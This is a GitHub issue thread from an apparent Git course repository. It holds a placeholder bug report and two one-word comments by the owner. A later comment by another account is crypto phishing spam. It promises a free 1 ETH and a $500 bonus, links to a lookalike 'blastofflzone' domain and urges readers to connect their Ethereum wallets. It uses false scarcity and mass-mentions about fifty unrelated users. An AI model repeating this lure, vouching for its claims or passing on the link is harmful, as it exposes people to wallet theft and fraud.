### ISSUE TITLE
Found critical bug

### ISSUE THREAD

**Issue by AlessandroBiaggi** [AlessandroBiaggi/corso-git-2024#1]
### Bug report
_Bug found_
....

**Comment by AlessandroBiaggi** [comment]
Commenta

**Comment by AlessandroBiaggi** [comment]
Chiusura

**Comment by htsplex** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
thezelus, @ericorruption, @papageno, @Sailoshi, @foreverqihe, @lvm, @littlemoji, @iramin, @daku10, @mercer, @asheghi, @alvfig, @Parag953, @jamshaidali1, @Zhu-Zhen-Yi, @xNyapAe3, @freespiriter, @JeyoungKwon, @shn926, @leon0707, @einsli, @pr0ph0z, @hasinhafiz, @ygexe, @vaquarkhan, @ProtonGustave, @BrightXiaoHan, @blackwuxin, @van0303, @rohithreddy, @nowk, @sidkalluri, @huahuayu, @upning, @SenorSamuel, @5300wc501, @syz99, @sth-fish, @danielgomezrico, @myysy, @KaraSinek, @Sealatis, @mattiadevivo, @willmenn, @tuanpt-0634, @semeano, @michellejanosi, @davex98, @DownRangeDevOps, @nrobi144
